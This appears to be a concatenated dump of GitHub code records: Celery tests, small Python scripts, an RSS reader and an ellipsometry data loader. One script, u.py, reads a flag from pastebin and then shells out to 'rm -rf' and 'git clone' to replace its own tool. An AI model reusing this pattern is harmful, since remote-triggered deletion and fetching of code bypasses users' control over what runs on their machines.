subtasks]\n self.assertEqual(len(list(ts.iter_native())), 10)\n\n def test_iterate_yields(self):\n ar = MockAsyncResultSuccess(uuid(), app=self.app)\n ar2 = MockAsyncResultSuccess(uuid(), app=self.app)\n ts = self.app.GroupResult(uuid(), [ar, ar2])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n self.assertEqual(next(it), 42)\n self.assertEqual(next(it), 42)\n\n def test_iterate_eager(self):\n ar1 = EagerResult(uuid(), 42, states.SUCCESS)\n ar2 = EagerResult(uuid(), 42, states.SUCCESS)\n ts = self.app.GroupResult(uuid(), [ar1, ar2])\n with self.assertPendingDeprecation():\n it = ts.iterate()\n self.assertEqual(next(it), 42)\n self.assertEqual(next(it), 42)\n\n def test_join_timeout(self):\n ar = MockAsyncResultSuccess(uuid(), app=self.app)\n ar2 = MockAsyncResultSuccess(uuid(), app=self.app)\n ar3 = self.app.AsyncResult(uuid())\n ts = self.app.GroupResult(uuid(), [ar, ar2, ar3])\n with self.assertRaises(TimeoutError):\n ts.join(timeout=0.0000001)\n\n ar4 = self.app.AsyncResult(uuid())\n ar4.get = Mock()\n ts2 = self.app.GroupResult(uuid(), [ar4])\n self.assertTrue(ts2.join(timeout=0.1))\n\n def test_iter_native_when_empty_group(self):\n ts = self.app.GroupResult(uuid(), [])\n self.assertListEqual(list(ts.iter_native()), [])\n\n def test_iterate_simple(self):\n with self.assertPendingDeprecation():\n it = self.ts.iterate()\n results = sorted(list(it))\n self.assertListEqual(results, list(range(self.size)))\n\n def test___iter__(self):\n self.assertListEqual(list(iter(self.ts)), self.ts.results)\n\n def test_join(self):\n joined = self.ts.join()\n self.assertListEqual(joined, list(range(self.size)))\n\n def test_successful(self):\n self.assertTrue(self.ts.successful())\n\n def test_failed(self):\n self.assertFalse(self.ts.failed())\n\n def test_waiting(self):\n self.assertFalse(self.ts.waiting())\n\n def test_ready(self):\n self.assertTrue(self.ts.ready())\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), len(self.ts))\n\n\nclass test_pending_AsyncResult(AppCase):\n\n def setup(self):\n self.task = self.app.AsyncResult(uuid())\n\n def test_result(self):\n self.assertIsNone(self.task.result)\n\n\nclass test_failed_AsyncResult(test_GroupResult):\n\n def setup(self):\n self.size = 11\n subtasks = make_mock_group(self.app, 10)\n failed = mock_task('ts11', states.FAILURE, KeyError('Baz'))\n save_result(self.app, failed)\n failed_res = self.app.AsyncResult(failed['id'])\n self.ts = self.app.GroupResult(uuid(), subtasks + [failed_res])\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), len(self.ts) - 1)\n\n def test_iterate_simple(self):\n with self.assertPendingDeprecation():\n it = self.ts.iterate()\n\n def consume():\n return list(it)\n\n with self.assertRaises(KeyError):\n consume()\n\n def test_join(self):\n with self.assertRaises(KeyError):\n self.ts.join()\n\n def test_successful(self):\n self.assertFalse(self.ts.successful())\n\n def test_failed(self):\n self.assertTrue(self.ts.failed())\n\n\nclass test_pending_Group(AppCase):\n\n def setup(self):\n self.ts = self.app.GroupResult(\n uuid(), [self.app.AsyncResult(uuid()),\n self.app.AsyncResult(uuid())])\n\n def test_completed_count(self):\n self.assertEqual(self.ts.completed_count(), 0)\n\n def test_ready(self):\n self.assertFalse(self.ts.ready())\n\n def test_waiting(self):\n self.assertTrue(self.ts.waiting())\n\n def x_join(self):\n with self.assertRaises(TimeoutError):\n self.ts.join(timeout=0.001)\n\n def x_join_longer(self):\n with self.assertRaises(TimeoutError):\n self.ts.join(timeout=1)\n\n\nclass test_EagerResult(AppCase):\n\n def setup(self):\n\n @self.app.task(shared=False)\n def raising(x, y):\n raise KeyError(x, y)\n self.raising = raising\n\n def test_wait_raises(self):\n res = self.raising.apply(args=[3, 3])\n with self.assertRaises(KeyError):\n res.wait()\n self.assertTrue(res.wait(propagate=False))\n\n def test_wait(self):\n res = EagerResult('x', 'x', states.RETRY)\n res.wait()\n self.assertEqual(res.state, states.RETRY)\n self.assertEqual(res.status, states.RETRY)\n\n def test_forget(self):\n res = EagerResult('x', 'x', states.RETRY)\n res.forget()\n\n def test_revoke(self):\n res = self.raising.apply(args=[3, 3])\n self.assertFalse(res.revoke())\n\n\nclass test_tuples(AppCase):\n\n def test_AsyncResult(self):\n x = self.app.AsyncResult(uuid())\n self.assertEqual(x, result_from_tuple(x.as_tuple(), self.app))\n self.assertEqual(x, result_from_tuple(x, self.app))\n\n def test_with_parent(self):\n x = self.app.AsyncResult(uuid())\n x.parent = self.app.AsyncResult(uuid())\n y = result_from_tuple(x.as_tuple(), self.app)\n self.assertEqual(y, x)\n self.assertEqual(y.parent, x.parent)\n self.assertIsInstance(y.parent, AsyncResult)\n\n def test_compat(self):\n uid = uuid()\n x = result_from_tuple([uid, []], app=self.app)\n self.assertEqual(x.id, uid)\n\n def test_GroupResult(self):\n x = self.app.GroupResult(\n uuid(), [self.app.AsyncResult(uuid()) for _ in range(10)],\n )\n self.assertEqual(x, result_from_tuple(x.as_tuple(), self.app))\n self.assertEqual(x, result_from_tuple(x, self.app))\n","repo_name":"Chudry/Xerror","sub_path":"env/lib/python2.7/site-packages/celery/tests/tasks/test_result.py","file_name":"test_result.py","file_ext":"py","file_size_in_byte":24135,"program_lang":"python","lang":"en","doc_type":"code","stars":477,"dataset":"github-code","pt":"16"}
+{"seq_id":"37360285773","text":"#coding: utf8\r\n\r\nimport unittest\r\nimport os\r\nfrom workers import cnbeta\r\n\r\nclass CnBetaTests(unittest.TestCase):\r\n\r\n def setUp(self):\r\n dir_name = os.path.dirname(os.path.realpath(__file__))\r\n with open(os.path.join(dir_name, \"testdata/cnbeta/1.txt\"), encoding='utf8') as f:\r\n self.text_data = f.read()\r\n\r\n def test_get_comments_details(self):\r\n details = cnbeta.get_comments_details(self.text_data)\r\n self.assertIsNotNone(details)\r\n self.assertEqual(2, len(details))\r\n self.assertEqual(\"270774\", details[0])\r\n self.assertEqual(\"4f299\", details[1])\r\n\r\n def test_get_op_code(self):\r\n op_code = cnbeta.get_op_code(\"270774\", \"4f299\", 1)\r\n self.assertEqual(\"MSwyNzA3NzQsNGYyOTk=1234567\", op_code)\r\n\r\n def test_get_comments(self):\r\n op_code = \"MSwyNzA2NTAsYTYwMWI%3DuscCHONc\"\r\n comments = cnbeta.get_comments(op_code)\r\n self.assertIsNotNone(comments)\r\n\r\n def test_get_article_list(self):\r\n article_list = cnbeta.get_article_list(1)\r\n self.assertIsNotNone(article_list)\r\n self.assertEqual(30, len(article_list))\r\n","repo_name":"Syndim/NewsReader","sub_path":"website/tests/workers/cnbeta.py","file_name":"cnbeta.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20899756132","text":"import sys\n\n\ndef menu(userinput):\n while userinput is not 'q':\n if userinput == '1':\n print(userinput)\n if userinput == '2':\n print(userinput + str(2))\n if userinput == 'q':\n sys.exit(0)\n print(\"1. GoDie \\n 2. GoSwim\\n 3. GoDance\\n 4. q - Quit\")\n userinput = input(\"Enter your choice: \")\n\n\ndef test():\n print(\"\\n1. GoDie \\n 2. GoSwim\\n 3. GoDance\\n 4. q - Quit\")\n userinput = input(\"Enter your choice: \")\n if userinput == 'q':\n sys.exit(0)\n menu(userinput)\n\n\nif __name__ == '__main__':\n test()","repo_name":"bikash0109/Python-Progs","sub_path":"first sem/Lab7/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22916037464","text":"import sys\r\n\r\nsys.stdin = open(\"b1.in\", \"r\")\r\n#sys.stdout = open(\"b1.out\", \"w\")\r\nT = int(input())\r\n\r\n#B1\r\ndef rec(N):\r\n if N == 1:\r\n return 0\r\n if N % 3 == 0:\r\n Y, Z = N / 3, 2 * N / 3\r\n return int(Y * Z) + rec(Y) + rec(Z)\r\n elif N % 2 == 0:\r\n return int((N/2)**2) + rec(N/2)\r\n else:\r\n return int(N - 1) + int(rec(N - 1))\r\n\r\nfor _ in range(T):\r\n input()\r\n N = int(input())\r\n print(rec(N))\r\n","repo_name":"aajjbb/contest-files","sub_path":"IPSC/BoredomBusters.py","file_name":"BoredomBusters.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"28160671378","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport feedparser\nimport os\nimport re\n\nclass RssFetcher():\n def getCon(self, rssSub):\n self.rssCon = feedparser.parse(rssSub)\n\n def outputer(self, num = 20):\n rssTitle = []\n rssSummary = []\n rssEntries = self.rssCon['entries']\n delPattern = re.compile(\"\")\n for i in range(len(rssEntries)):\n rssTitle.append(rssEntries[i]['title'])\n reSummary = re.sub(\"\", '', ''.join(rssEntries[i]['summary'].split('\\n')))\n reSummary = re.sub(\"\", '', reSummary)\n rssSummary.append(reSummary)\n if i >= num:\n break\n return rssTitle, rssSummary\n\nclass RssFetcher1():\n def getCon(self, rssSub):\n self.rssCon = feedparser.parse(rssSub)\n\n def outputer(self, num = 20):\n rssTitle = []\n rssSummary = []\n rssEntries = self.rssCon['entries']\n summary_pattern = re.compile(\"
(.*?)
\", re.S)\n for i in range(len(rssEntries)):\n rssTitle.append(rssEntries[i]['title'])\n if not re.findall('
', rssEntries[i]['summary']) == []:\n reSummary = '{enter}'.join(summary_pattern.findall(rssEntries[i]['summary']))\n else: reSummary = rssEntries[i]['summary']\n rssSummary.append(reSummary)\n if i >= num:\n break\n return rssTitle, rssSummary\n\n def run(self):\n self.getCon()\n return self.outputer()\n","repo_name":"cycoe/RSSReader","sub_path":"rssFetcher.py","file_name":"rssFetcher.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"36213132488","text":"import time\r\n\r\ncasa = float(input('Qual o valor da casa em questão? R$'))\r\nsal = float(input('Qual o salário do comprador? R$'))\r\nanos = int(input('Em quantos anos EXATOS você deseja pagar? >'))\r\n\r\ntrintaPCen = sal * 0.3\r\n\r\nanoMes = anos * 12\r\nmensalidade = casa / anoMes\r\n\r\n\r\ncores = {'vermelho':'\\033[31m',\r\n 'limpo': '\\033[m',\r\n 'verde': '\\033[32m'}\r\n\r\nprint('\\033[97;40mCalculando...\\033[m')\r\ntime.sleep(2)\r\n\r\nif mensalidade > trintaPCen:\r\n print('{}Infelizmente{} o preço da parcela iria lhe causar prejuízo. \\n'\r\n 'Recomendamos aumentar o tempo das parcelas, ou procurar por outra opção.'.format(\r\n cores['vermelho'],cores['limpo']))\r\n\r\n print(cores['vermelho'])\r\n\r\nelse:\r\n print('{}Parabéns!{} O preço está em conta com o seu salário.\\n'\r\n 'Em instantes disponibilizaremos um link e enviaremos para o seu email.\\n'\r\n 'AGUARDE!'.format(cores['verde'],cores['limpo']))\r\n\r\n print(cores['verde'])\r\n\r\ntime.sleep(1)\r\nprint('-='*30)\r\ntime.sleep(1)\r\nprint(f'Valor à pagar R${mensalidade:.2f}/mês, durante {anos} anos.')\r\nprint(f'•O valor máximo com base no seu salário é de {trintaPCen:.2f}')\r\nprint(cores['limpo'])","repo_name":"S4Yuuki/Curso.py","sub_path":"Atividades/036.py","file_name":"036.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"129964661","text":"import sys\nfrom collections import Counter\n\ninput = sys.stdin.readline\n\ncounter = Counter()\nN = int(input())\nfor _ in range(N):\n s = input().strip()\n counter[s] += 1\nprint(sorted(counter.most_common(), key=lambda x:(-x[1], x[0]))[0][0])\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/Hash/1302.py","file_name":"1302.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"34311017350","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\"\nA basic representation of a 1D dataset\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom refnx._lib import possibly_open_file\nfrom pathlib import PurePath\n\npd.options.mode.chained_assignment = None\n\n\nclass DataSE(object):\n r\"\"\"\n A basic representation of a 1D dataset.\n\n Parameters\n ----------\n data : {str, file-like, Path, tuple of np.ndarray}, optional\n String pointing to a data file.\n Alternatively it is a tuple containing the data from which the dataset\n will be constructed. The tuple should have 4 members.\n\n - data[0] - Wavelength (nm)\n - data[1] - Angle of incidence (degree)\n - data[2] - Psi\n - data[3] - Delta\n\n `data` must be four long.\n All arrays must have the same shape.\n\n mask : array-like\n Specifies which data points are (un)masked. Must be broadcastable\n to the data. `Data1D.mask = None` clears the mask. If a mask value\n equates to `True`, then the point is included, if a mask value equates\n to `False` it is excluded.\n\n reflect_delta : bool\n Specifies whether delta values are reflected around 180 degrees\n (i.e., 360 - delta[delta > 180]), as is standard for some ellipsometry\n analysis packages (i.e., WVASE).\n\n Attributes\n ----------\n AOI : np.ndarray\n angle of incidence (degree)\n mask : np.ndarray\n mask\n filename : str or None\n The file the data was read from\n weighted : bool\n Whether the y data has uncertainties\n metadata : dict\n Information that should be retained with the dataset.\n \"\"\"\n\n def __init__(\n self, data=None, name=None, delimiter=\"\\t\", reflect_delta=False, **kwds\n ):\n self.filename = None\n\n self.delimiter = delimiter\n self.metadata = kwds\n self._wavelength = np.zeros(0)\n self._aoi = np.zeros(0)\n self._psi = np.zeros(0)\n self._delta = np.zeros(0)\n # TODO when we come up with measurement uncertainties change this.\n self.weighted = False\n self.name = name\n\n # If a file, then open and load the file.\n if (\n hasattr(data, \"read\")\n or type(data) is str\n or isinstance(data, PurePath)\n ):\n self.load(data)\n self.filename = data\n\n # If already a DataSE object, then just use that.\n elif isinstance(data, DataSE):\n self.name = data.name\n self.filename = data.filename\n self.metadata = data.metadata\n self._wavelength = data._wavelength\n self._aoi = data._aoi\n self._psi = data._psi\n self._delta = data._delta\n\n # If a list or tuple, then assume its in format wavelength, AOI, psi, delta.\n elif isinstance(data, (list, tuple, np.ndarray)):\n self._wavelength = data[0]\n self._aoi = data[1]\n self._psi = data[2]\n self._delta = data[3]\n\n self._delta_flipped = False\n if reflect_delta:\n dmask = self._delta > 180\n self._delta[dmask] = 360 - self._delta[dmask]\n self._delta_flipped = True\n\n self.mask = np.ones_like(self._wavelength, dtype=bool)\n\n def __len__(self):\n \"\"\"Number of unmasked points in the dataset.\"\"\"\n return self.wavelength.size\n\n def __str__(self):\n return \"<{0}>, {1} points\".format(self.name, len(self))\n\n def __repr__(self):\n msk = self.mask\n if np.all(self.mask):\n msk = None\n\n d = {\"filename\": self.filename, \"msk\": msk, \"data\": self.data}\n if self.filename is not None:\n return \"Data1D(data={filename!r},\" \" mask={msk!r})\".format(**d)\n else:\n return \"Data1D(data={data!r},\" \" mask={msk!r})\".format(**d)\n\n def unique_wavelength_data(self):\n \"\"\"\n Generator yielding wavelength, AOI, psi, delta tuples for the unique\n wavelengths in a dataset (i.e. all the data points for a given\n wavelength)\n\n Returns\n -------\n wavelength, AOI, psi, delta\n \"\"\"\n unique_wavs = np.unique(self.wavelength)\n for unique_wav in unique_wavs:\n loc = np.where(self.wavelength == unique_wav)\n yield unique_wav, self.aoi[loc], self.psi[loc], self.delta[loc]\n\n @property\n def wavelength(self):\n \"\"\"wavelength(nm)\"\"\"\n\n if self._wavelength.size > 0:\n return self._wavelength[self.mask]\n else:\n return self._wavelength\n\n @property\n def aoi(self):\n \"\"\"Angle of incidence.\"\"\"\n if self._aoi.size > 0:\n return self._aoi[self.mask]\n else:\n return self._aoi\n\n @property\n def psi(self):\n \"\"\"Ellipsometric parameter psi.\"\"\"\n if self._psi.size > 0:\n return self._psi[self.mask]\n else:\n return self._psi\n\n @property\n def delta(self):\n \"\"\"Ellipsometric parameter delta.\"\"\"\n if self._delta.size > 0:\n return self._delta[self.mask]\n else:\n return self._delta\n\n @property\n def data(self):\n \"\"\"4-tuple containing the (wavelength), AOI, psi, delta) data.\"\"\"\n return self.wavelength, self.aoi, self.psi, self.delta\n\n @data.setter\n def data(self, data_tuple):\n \"\"\"\n Set the data for this object from the supplied data.\n\n Parameters\n ----------\n data_tuple : tuple\n 4 member tuple containing the (wav, aoi, psi, delta) data to\n specify the dataset.\n\n Notes\n -----\n Clears the mask for the dataset, it will need to be reapplied.\n\n \"\"\"\n self._wavelength = np.array(data_tuple[0], dtype=float)\n self._aoi = np.array(data_tuple[1], dtype=float)\n self._psi = np.array(data_tuple[2], dtype=float)\n self._delta = np.array(data_tuple[3], dtype=float)\n\n self.mask = np.ones_like(self._wavelength, dtype=bool)\n\n def save(self, f):\n \"\"\"\n Save the data to file. Saves the data as a 4 column ASCII file.\n\n Parameters\n ----------\n f : file-handle or string\n File to save the dataset to.\n\n \"\"\"\n header = \"wavelength\\tAOI\\tPsi\\tDelta\"\n np.savetxt(\n f,\n np.column_stack(\n (self._wavelength, self._aoi, self._psi, self._delta)\n ),\n delimiter=\"\\t\",\n header=header,\n )\n\n def load(self, f):\n \"\"\"\n Load a dataset from file.\n Must be a 4 column ASCII file with columns [wavelength, AOI, Psi, Delta].\n\n Parameters\n ----------\n f : file-handle or string\n File to load the dataset from.\n\n \"\"\"\n\n skip_lines = 0\n with possibly_open_file(f, \"r\") as text:\n for i in range(100): # check the first 100 lines\n try:\n float(text.readline().split(self.delimiter)[0])\n break\n except ValueError:\n skip_lines += 1\n\n self._wavelength, self._aoi, self._psi, self._delta = np.loadtxt(\n f, skiprows=skip_lines, delimiter=self.delimiter, encoding=\"utf8\"\n ).T\n\n def refresh(self):\n \"\"\"\n Refreshes a previously loaded dataset.\n\n \"\"\"\n if self.filename is not None:\n with open(self.filename) as f:\n self.load(f)\n\n\ndef open_EP4file(fname, reflect_delta=False):\n \"\"\"\n Open and load in an Accurion EP4 formmated data file.\n Typically a .dat file.\n\n Note: This file parser has been written for specific Accurion ellipsometers\n EP3 and EP4. No work has been done to ensure it is compatible with all\n Accurion ellipsometers. If you have trouble with this parser contact the\n maintainers through github.\n\n Parameters\n ----------\n fname : file-handle or string\n File to load the dataset from.\n\n reflect_delta : bool\n Option to reflect delta around 180 degrees (as WVASE would).\n\n Returns\n ----------\n datasets : DataSE structure\n Structure containing wavelength, angle of incidence, psi and delta.\n\n\n \"\"\"\n df = pd.read_csv(fname, sep=\"\\t\", skiprows=[1])\n df = df.dropna(axis=0, how=\"any\")\n # normally the NaN are at the end of the file, but they can also be in\n # the middle\n df = df.reset_index()\n\n try:\n df[\"Time\"]\n time_data = True\n except KeyError:\n time_data = False\n print(\"No time data.\")\n\n if time_data and len(df[\"Time\"].drop_duplicates()) > 1:\n print(\"Treating as time series:\")\n output = []\n for t in df[\"Time\"].drop_duplicates():\n tdf = df[df[\"Time\"] == t]\n output += _loadEP4(tdf) # not sure if this will work\n output[-1][\"time\"] = t\n else:\n output = _loadEP4(df)\n for op in output:\n op[\"time\"] = None\n\n datasets = []\n for op in output:\n data = [op[\"lambda\"], op[\"aoi\"], op[\"psi\"], op[\"delta\"]]\n del op[\"lambda\"]\n del op[\"aoi\"]\n del op[\"psi\"]\n del op[\"delta\"]\n name = _make_EP4dname(fname, op)\n datasets.append(\n DataSE(data, name=name, reflect_delta=reflect_delta, **op)\n )\n\n if len(datasets) == 1:\n return datasets[0]\n else:\n return datasets\n\n\ndef _make_EP4dname(name, metadata):\n \"\"\"\n Create a helpful name for a data set based on an Accurion EP4\n formatted data file.\n\n Parameters\n ----------\n name : file-handle or string\n File name of data set.\n\n metadata : dict\n Dict containinng 'X pos', 'Y pos' and 'time' data.\n\n Returns\n ----------\n base : string\n Helpful name for the data set.\n\n \"\"\"\n name = str(name)\n base = name[: -len(\"_20200929-083122.ds.dat\")]\n if metadata[\"X pos\"] is not None:\n base += f\"_x={metadata['X pos']}mm_y={metadata['Y pos']}mm\"\n if metadata[\"time\"] is not None:\n base += f\"_t={metadata['time']}s\"\n return base\n\n\ndef custom_round(x, base=0.25):\n \"\"\"\n Perform rounding to a particular base. Default base is 0.25.\n\n Parameters\n ----------\n x : DataFrame, array or list\n Data to be rounded.\n\n base : float\n Base that the rounding will be with respect to.\n\n Returns\n ----------\n Result of cutsom round : np.array\n\n \"\"\"\n x = np.array(x, dtype=float)\n return np.round((base * np.round(x / base)), 2)\n\n\ndef _loadEP4(df):\n \"\"\"\n Specifically loading a data file created by an Accurion EP4 ellipsometer.\n Dataframe should have colums ['#Lambda','AOI','Psi','Delta'].\n Optionally can also have columns [X_pos, Y_pos].\n\n\n Parameters\n ----------\n df : DataFrame\n Data frame containing the wavelength, angle of incidence, psi and\n delta data.\n\n Returns\n ----------\n output : list of dicts\n Dicts containing wavelength, angle of indcidence, psi, delta and\n possible X pos and Y pos.\n\n \"\"\"\n\n try:\n df[\"X_pos\"]\n df[\"Y_pos\"]\n loc_data = True\n except KeyError:\n loc_data = False\n\n if loc_data and (\n len(df[\"X_pos\"].drop_duplicates()) > 1\n or len(df[\"Y_pos\"].drop_duplicates()) > 1\n ):\n xpos = np.nan\n ypos = np.nan\n\n area_indices = []\n for entry in df.iterrows():\n if (not np.allclose(xpos, entry[1][\"X_pos\"], atol=0.2)) or (\n not np.allclose(ypos, entry[1][\"Y_pos\"], atol=0.2)\n ):\n idx = entry[0]\n xpos = entry[1][\"X_pos\"]\n ypos = entry[1][\"Y_pos\"]\n area_indices.append(idx)\n area_indices.append(len(df))\n\n if len(area_indices) > 2:\n print(\"Treating as multiple locations\")\n else:\n print(\"Treating as single location\")\n\n output = []\n for i in range(len(area_indices) - 1):\n pdf = df.loc[area_indices[i] : area_indices[i + 1] - 1][\n [\"#Lambda\", \"AOI\", \"Psi\", \"Delta\", \"X_pos\", \"Y_pos\"]\n ]\n\n if len(pdf.index) > 0:\n ave_pos = pdf.groupby([\"AOI\", \"#Lambda\"]).mean()\n ave_pos = ave_pos.reset_index()\n\n summary = {\n \"lambda\": np.array(ave_pos[\"#Lambda\"]),\n \"aoi\": np.array(ave_pos[\"AOI\"]),\n \"psi\": np.array(ave_pos[\"Psi\"]),\n \"delta\": np.array(ave_pos[\"Delta\"]),\n \"X pos\": np.round(np.mean(ave_pos[\"X_pos\"]), 2),\n \"Y pos\": np.round(np.mean(ave_pos[\"Y_pos\"]), 2),\n }\n output.append(summary)\n else:\n print(\"Treating as single location\")\n df = df[[\"#Lambda\", \"AOI\", \"Psi\", \"Delta\"]]\n ave_pos = df.groupby([\"AOI\", \"#Lambda\"]).mean()\n ave_pos = ave_pos.reset_index()\n\n summary = {\n \"lambda\": np.array(ave_pos[\"#Lambda\"]),\n \"aoi\": np.array(ave_pos[\"AOI\"]),\n \"psi\": np.array(ave_pos[\"Psi\"]),\n \"delta\": np.array(ave_pos[\"Delta\"]),\n \"X pos\": None,\n \"Y pos\": None,\n }\n output = [summary]\n\n return output\n\n\ndef open_HORIBAfile(\n fname, reflect_delta=False, lambda_cutoffs=[-np.inf, np.inf]\n):\n \"\"\"\n Opening and loading in a data file created by a Horiba ellipsometer. Data\n file loaded should be of the Horiba file format .spe.\n\n Note: This file parser has been written for a specific ellipsometer, no\n work has been done to ensure it is compatable with all Horiba\n ellipsometers. If you have trouble with this parser contact the maintainers\n through github.\n\n Parameters\n ----------\n fname : file-handle or string\n File to load the dataset from.\n\n reflect_delta : bool\n Option to reflect delta around 180 degrees (as WVASE would).\n\n lambda_cutoffs : list\n Specifies the minimum and maximum wavelengths of data to be loaded.\n List has length 2.\n\n Returns\n ----------\n DataSE : DataSE structure\n The data file structure from the loaded Horiba file.\n\n \"\"\"\n\n name = fname[:-4]\n metadata = {}\n linenodict = {}\n MDingest = False\n\n with open(fname, \"r\") as f:\n lines = f.readlines()\n\n for i, line in enumerate(lines):\n line = line.strip() # Drop newline character\n if not MDingest:\n if len(line) and line[0] == \"#\":\n MDlabel = \" \".join(line.split(\" \")[1:])[:-1]\n metadata[MDlabel] = []\n linenodict[MDlabel] = i\n MDingest = True\n\n else:\n if not len(line):\n MDingest = False\n if not len(\n metadata[MDlabel]\n ): # there is no metadata for entry\n metadata[MDlabel] = None # Set metadata to none\n elif len(metadata[MDlabel]) == 1: # there is only one entry\n metadata[MDlabel] = metadata[MDlabel][\n 0\n ] # remove data from list\n\n else: # there is metadata in the line\n metadata[MDlabel].append(\n line\n ) # append line to metadata entry\n\n data_df = pd.read_csv(\n fname,\n skiprows=linenodict[\"DATA\"] + 1,\n nrows=len(metadata[\"DATA\"]) - 1,\n encoding=\"ANSI\",\n delimiter=\" \",\n usecols=[\"nm\", \"Psi\", \"Delta\"],\n )\n\n AOI = float(metadata[\"INCIDENCE ANGLE\"][:5])\n data_df[\"AOI\"] = AOI * np.ones_like(data_df[\"nm\"])\n data_df = data_df[data_df[\"nm\"] > lambda_cutoffs[0]]\n data_df = data_df[data_df[\"nm\"] < lambda_cutoffs[1]]\n\n data = [data_df[\"nm\"], data_df[\"AOI\"], data_df[\"Psi\"], data_df[\"Delta\"]]\n\n return DataSE(data, name=name, reflect_delta=reflect_delta, **metadata)\n","repo_name":"refnx/refellips","sub_path":"refellips/dataSE.py","file_name":"dataSE.py","file_ext":"py","file_size_in_byte":16035,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
+{"seq_id":"38786469785","text":"s = list(input())\n\nmax = 0\nfor i in range(len(s)):\n for j in reversed(range(len(s) + 1)):\n cnt = 0\n for k in range(i, j):\n if s[k] == \"A\" or s[k] == \"C\" or s[k] == \"G\" or s[k] == \"T\":\n cnt += 1\n else:\n cnt = 0\n break\n if max < cnt:\n max = cnt\nprint(max)\n","repo_name":"RuRey0310/Competitive_Programming","sub_path":"ABC100~150/ABC122/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13322755031","text":"import getpass,time,os,sys\nimport os \nab=\"1\"\nimport signal\nimport time,os,sys\nimport sys, random\nimport threading,time\nimport os,requests\nos.system(\"pip install mechanize \")\nblue= '\\33[94m'\nlightblue = '\\033[94m'\nred = '\\033[91m'\nwhite = '\\33[97m'\nyellow = '\\33[93m'\ngreen = '\\033[1;32m'\ncyan = \"\\033[96m\"\nend = '\\033[0m'\nblack=\"\\033[0;30m\"\nblue= '\\33[94m'\nlightblue = '\\033[94m'\nred = '\\033[91m'\nwhite = '\\33[97m'\nyellow = '\\33[93m'\ngreen = '\\033[1;32m'\ncyan = \"\\033[96m\"\nend = '\\033[0m'\nblack=\"\\033[0;30m\"\npink=\"\\x1b[95m\"\nblue=\"\\x1b[94m\"\nunderline='\\x1b[4m'\ncolouroff=\"\\x1b[00m\"\nimport os,sys,time,random\nprint(\"\")\nprint(\"\")\ncolor = [\"\\033[1;31m\",\"\\033[1;32m\", \"\\033[96m\", '\\33[93m' '\\33[94m']\nm = random.choice(color)+\"Update CK \"\nfor msg in m:\n sys.stdout.write(msg)\n sys.stdout.flush()\n time.sleep(0.09)\nprint(\"\")\n\nlogu=(pink+f\"\"\"\n\\t ____ _ _ ____\n\\t / ___| | | | | | __ )\n\\t| | | |_| | | _ \\ \"\"\"+colouroff+underline+\"\"\"CYBER HUNTER BD\"\"\"+colouroff+pink+\"\"\"\n\\t| |___ | _ | | |_) |\n\\t \\____| |_| |_| |____/ \n\\n\"\"\"+blue+\"\"\" Focous on Your Aim, You Will winner\"\"\")\n\n\nline=end+\"\\n__________________________________________________________\"\ndef a():\n\tprint(logu+\"\\n\\n\t\"+green+\" Developed By : MD ALAMIN CHOWDORY\"+green+\"\\n\\n \t\"+red+\" \\n\\n \"+line)\na()\n\nr=requests.get(\"https://pastebin.com/zHRgbXCi\").text\n\nr2=str(r)\n\nif ab==r2:\n pass\n os.system(\"python main.py\")\n \nelse:\n print(\"update This Tool \")\n \n os.system(\"cd $home && rm -rf chb && git clone https://github.com/CyberHanterBangladesh/chb \")\n \n","repo_name":"HIDDEN-VIRUS/chb","sub_path":"u.py","file_name":"u.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"}
+{"seq_id":"69828021449","text":"# -*- coding=utf-8 -*-\r\n# author: zhihua.ye@spreadtrum.com\r\n\r\nimport sys\r\nimport os\r\n#sys.path.append('./')\r\n#print sys.path\r\nimport definition\r\nfrom config import *\r\nfrom lib.logConf import logConf\r\nfrom lib.logutils import logutils\r\nfrom helper.processmap import *\r\nfrom helper.excelhelper import *\r\nimport re\r\nfrom easygui import *\r\n\r\n#TODO list:\r\n#1. find pid by words\r\n#1.1 pid may change, process restart\r\n#2. unittest\r\n#3. decode flow\r\n#3.1 idea is different from old style:\r\n# media only need the process, simple is beautiful.\r\n# record start\r\n\r\n# record end\r\n# for phrase one:\r\n# 1. log grep\r\n# 2. data statistics\r\n# TODO: 3. vowifi video start/stop\r\n# FIXED: 4. call info\r\n# FIXED: record statistics, pps, sps,rtp\r\n# TODO: add simple UI.\r\n\r\nclass mflow:\r\n def __init__(self, logname='', outdir='./', loglevel='DEBUG'):\r\n self.log = os.path.realpath(logname)\r\n with open(self.log, 'rb') as logfile:\r\n self.loglines = logfile.readlines()\r\n self.logger = logConf(debuglevel=loglevel)\r\n self.logger.logger.info('init flow')\r\n self.config = config()\r\n self.logutils = logutils()\r\n\r\n logbasename = os.path.basename(logname)\r\n # get prefix, get timestamp\r\n prefix = logbasename.split('.')[0]\r\n self.version = self.config.getversion()\r\n #output is in one extra dir\r\n self.outdir = os.path.dirname(logname) + '/output'\r\n self.logutils.mkdirp(self.outdir)\r\n\r\n self.trimlog = self.outdir + '/' + 